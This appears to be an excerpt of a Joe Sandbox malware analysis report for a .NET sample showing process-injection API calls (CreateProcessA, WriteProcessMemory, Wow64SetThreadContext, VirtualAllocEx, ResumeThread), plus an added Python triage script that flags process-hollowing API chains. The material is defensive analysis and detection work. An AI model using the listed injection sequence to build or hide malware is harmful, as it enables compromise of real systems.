                                                                      • Instruction ID: 90612c21ae785ade7884cbb6c704b75f19ecfafec5fb3f77a8975d812118b7f5
                                                                      • Opcode Fuzzy Hash: 3954ba3b0cab66d41dc251cd04284faa3ba0b0fc89cf029dc768aff5d4cad253
                                                                      • Instruction Fuzzy Hash: 262137B6D003098FDB10DFAAC4857EEBBF4EF48321F54842AD459A7240CB799985CFA5
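The API references the report attributes to the 07530000 dump region (CreateProcessA, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext) are the set a triager checks when confirming a process-injection verdict. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" / "Memory Dump Source" lines in exactly the format printed in this listing, groups API references by dump region, and flags any region whose API set covers the create, write and set-context roles of a process-hollowing (RunPE) sequence. The role table is generic knowledge about that sequence, not something the report states; the sample input is a condensed copy of the lines above, embedded so the script runs offline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the "APIs" / "Memory Dump Source" lines of the
# function listing above, condensed to one entry per API and region. The
# report lists some wrappers twice (e.g. two WriteProcessMemory functions
# with the same ref); the parser keys on ref addresses, so duplicates collapse.
SAMPLE_LISTING = """\
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0753E3D6
Memory Dump Source
• Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0753DFA8
Memory Dump Source
• Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0753E088
Memory Dump Source
• Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0753D9F6
Memory Dump Source
• Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
APIs
• GetCurrentProcess.KERNEL32 ref: 0180D646
• GetCurrentThread.KERNEL32 ref: 0180D683
Memory Dump Source
• Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 07515DEF
Memory Dump Source
• Source File: 00000000.00000002.1280056316.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
"""

# "• Name.MODULE(args), ref: ADDR" or the shorter "• Name.MODULE ref: ADDR" form.
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The dump-region line that closes each entry.
REGION_RE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)", re.I
)

# Roles in the classic process-hollowing (RunPE) sequence. This is assumed
# generic knowledge, not something the report states. Only the roles the
# excerpt actually lists are required for a hit; the rest are reported as gaps.
ROLES = {
    "create": {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    "alloc": {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    "write": {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "read": {"ReadProcessMemory", "NtReadVirtualMemory"},
    "context": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume": {"ResumeThread", "NtResumeThread"},
}
REQUIRED = ("create", "write", "context")


@dataclass
class Region:
    offset: str
    backed_by_pe: bool
    apis: dict = field(default_factory=dict)  # api name -> set of ref addresses


def parse_listing(text):
    """Group API references by the memory-dump region that contains them."""
    regions, pending = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            pending.append((m["api"], m["ref"].upper()))
            continue
        m = REGION_RE.search(line)
        if m:
            off = m["offset"].upper()
            region = regions.setdefault(off, Region(off, m["pe"].lower() == "true"))
            for api, ref in pending:
                region.apis.setdefault(api, set()).add(ref)
            pending = []
    return regions


def assess_region(region):
    """Map the region's APIs onto RunPE roles and decide whether the chain is present."""
    seen = {role for role, names in ROLES.items() if names & set(region.apis)}
    chain = all(role in seen for role in REQUIRED)
    return {
        "offset": region.offset,
        "verdict": "process-hollowing chain" if chain else "no chain",
        "seen": sorted(seen),
        "missing": [role for role in ROLES if role not in seen],
        "backed_by_pe": region.backed_by_pe,
    }


def triage(text):
    return {off: assess_region(r) for off, r in parse_listing(text).items()}


def hollowing_regions(text):
    return sorted(off for off, a in triage(text).items() if a["verdict"] != "no chain")


if __name__ == "__main__":
    for off, a in sorted(triage(SAMPLE_LISTING).items()):
        print(off, a["verdict"], "seen:", a["seen"], "missing:", a["missing"])
```

On the sample this reports 07530000 as a hit with the alloc and resume roles missing, because neither VirtualAllocEx nor ResumeThread appears in this excerpt; treat that as a partial chain to confirm against the rest of the report rather than a complete one, and note that co-location of the calls in one dumped region is a heuristic, not proof of the call order. All three regions carry "based on PE: false", i.e. they are not backed by a mapped image, which for a .NET sample is consistent with JIT-compiled code reaching these functions through P/Invoke; those targets live in the managed metadata rather than the PE import table, so a static check of the file on disk has to look there instead of at the imports.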

                                                                      Control-flow Graph
                                                                      • Rendered graph omitted: function 180d808-180d8ca (blocks coloured Executed / Not Executed), calls DuplicateHandle
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0753E088
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0753D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0180D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0753DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0753DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0180B17E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257094780.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_157d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257006684.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_156d000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1257968506.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1800000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1280145362.0000000007530000.00000040.00000800.00020000.00000000.sdmp, Offset: 07530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7530000_AWB#150332.jbxd

                                                                      Execution Graph

                                                                      Execution Coverage: 12.6%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 59
                                                                      Total number of Limit Nodes: 5

                                                                      Control-flow Graph (graph rendering omitted; function at 62fe549, calls GlobalMemoryStatusEx)
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1338662820.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_62f0000_RegSvcs.jbxd

                                                                      Control-flow Graph (graph rendering omitted; function at 2d17350, calls DeleteFileW)
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02D173C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1332822293.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_2d10000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0

                                                                      Control-flow Graph (graph rendering omitted; function at 2d163b8, calls DeleteFileW)
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 02D173C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1332822293.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_2d10000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0

                                                                      Control-flow Graph (graph rendering omitted; function at 62fe630, calls GlobalMemoryStatusEx)
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 062FE697
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1338662820.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_62f0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0

                                                                      Execution Graph

                                                                      Execution Coverage: 10.2%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 139
                                                                      Total number of Limit Nodes: 11

                                                                      Control-flow Graph (graph rendering omitted; function at 732e194, calls CreateProcessA)
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0732E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0

                                                                      Control-flow Graph (graph rendering omitted; function at 732e1a0, calls CreateProcessA)
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0732E3D6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: f5e448f6d47ddc762301220fc19cff56ea42e0050c620374a74d137a4eeff8c8
                                                                      • Instruction ID: 2ccd7dfa8fd06161ec2475415315d24f41529d20bfce2fd71af4e11bda327b49
                                                                      • Opcode Fuzzy Hash: f5e448f6d47ddc762301220fc19cff56ea42e0050c620374a74d137a4eeff8c8
                                                                      • Instruction Fuzzy Hash: 469160B1D0032ACFEB24DF68C8457DDBBB2BF48310F148569E819A7240DB759986DF91

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02A8B17E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 8ea904a88bc5fe3221f2464e6176638f0700f50f261edf6d241c147256f1c4bc
                                                                      • Instruction ID: daea19bde7ee86adfc0d90da0e3036c715f0d4cf949b1961072342cded2d5cc9
                                                                      • Opcode Fuzzy Hash: 8ea904a88bc5fe3221f2464e6176638f0700f50f261edf6d241c147256f1c4bc
                                                                      • Instruction Fuzzy Hash: 2A814870A00B458FD724EF29D59079ABBF1FF48304F008A2ED096DBA50DB35E949CBA1

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 02A859C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 56336606f1ad7b2e44a65c1407b3d1e572e5651417ea8d3d87d22de32881ced7
                                                                      • Instruction ID: 379778d3bd29529bd53fd5efc55e4a75e99fdb84c2e5fd1bbb2f659678c36cf9
                                                                      • Opcode Fuzzy Hash: 56336606f1ad7b2e44a65c1407b3d1e572e5651417ea8d3d87d22de32881ced7
                                                                      • Instruction Fuzzy Hash: 9841B071C0072DCBDB24DFA9C884B9DBBF5BF48314F60816AD809AB251DB756946CF90

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 02A859C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 6fcce887c0d1c5268ad7149902ae5cfb0c71e873128569e1fc1219ba47cc4898
                                                                      • Instruction ID: 6c5cf5989744131a2c71db7e114d91ca7c68d2154a7649c335ed6f2c926c81e5
                                                                      • Opcode Fuzzy Hash: 6fcce887c0d1c5268ad7149902ae5cfb0c71e873128569e1fc1219ba47cc4898
                                                                      • Instruction Fuzzy Hash: 5941D071C00729CBEB24DFA9C884B9DBBF2BF49314F60816AD408AB255DB75694ACF50

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07305DEF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 4cf625133e3b3724803f65a73842a01a06f66ba73d503ffe192324f05aad4d9f
                                                                      • Instruction ID: f091257f0f8332bbf837b9cf69919db8f6f227a5236d5fbcf647b014ae6ddf73
                                                                      • Opcode Fuzzy Hash: 4cf625133e3b3724803f65a73842a01a06f66ba73d503ffe192324f05aad4d9f
                                                                      • Instruction Fuzzy Hash: D531E6B5D0034A9FDB10DF99D884ADEFBF5FB48320F14842AE819A7250D775A954CFA0

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0732DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 95a440a042dc49c81f25f1bab9d3786acef83e327a8dd70dc302e383ddaf02df
                                                                      • Instruction ID: 253810d2ab10e388466e45660ec8584882d6a2023f462b3ee08f85f7d723edd1
                                                                      • Opcode Fuzzy Hash: 95a440a042dc49c81f25f1bab9d3786acef83e327a8dd70dc302e383ddaf02df
                                                                      • Instruction Fuzzy Hash: D9217CB5D103599FDB10DFA9C885BDEBBF1FF48310F108829E918A7240C7749941CB64

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0732DFA8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: ff4db9eb600e970f2241d472fd60431c4da448066fb346fe21e31b2addc6f811
                                                                      • Instruction ID: eaeb8a2ccc34aec2b42159a433d65bbafd75b6cd24eb288db6348467277c370f
                                                                      • Opcode Fuzzy Hash: ff4db9eb600e970f2241d472fd60431c4da448066fb346fe21e31b2addc6f811
                                                                      • Instruction Fuzzy Hash: BA2166B5D103599FDB10DFAAC881BEEBBF5FF48310F10842AE918A7240C7789941DBA4

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07305DEF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DrawText
                                                                      • String ID:
                                                                      • API String ID: 2175133113-0
                                                                      • Opcode ID: 574dc497bb53c608c9b4a20373896278b9fc54941d814dc047f9909b9f71bb2d
                                                                      • Instruction ID: e480aa35d003f36b315ca392f99256fba849d63c391cdb4f3faf82b84eae3419
                                                                      • Opcode Fuzzy Hash: 574dc497bb53c608c9b4a20373896278b9fc54941d814dc047f9909b9f71bb2d
                                                                      • Instruction Fuzzy Hash: 7D21D2B5D0034A9FDB10CF9AD884ADEFBF5FB48320F14842AE919A7250D775A954CFA0

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0732E088
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 0908e837b1b743651c9efad38b08ec2c577d241525f0254d6d21303f4fecce61
                                                                      • Instruction ID: 68f97d0bfec3165cd45ad8718ebd33efe421db75875856a49f9a64fcd716635d
                                                                      • Opcode Fuzzy Hash: 0908e837b1b743651c9efad38b08ec2c577d241525f0254d6d21303f4fecce61
                                                                      • Instruction Fuzzy Hash: 9E213B71C003599FDB10DFAAC841BDEBBF5FF48310F508529E919A7240C7359941DBA5

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0732D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: b2bd27ac0ac30f93f5e5b5e564e94e0d0ba0b6f05182f5ebd2cab353ae2b8140
                                                                      • Instruction ID: 8a7e5b8331e77f32b5243dc54f274c289b10746f41f256ab13eb485e00cf4b3b
                                                                      • Opcode Fuzzy Hash: b2bd27ac0ac30f93f5e5b5e564e94e0d0ba0b6f05182f5ebd2cab353ae2b8140
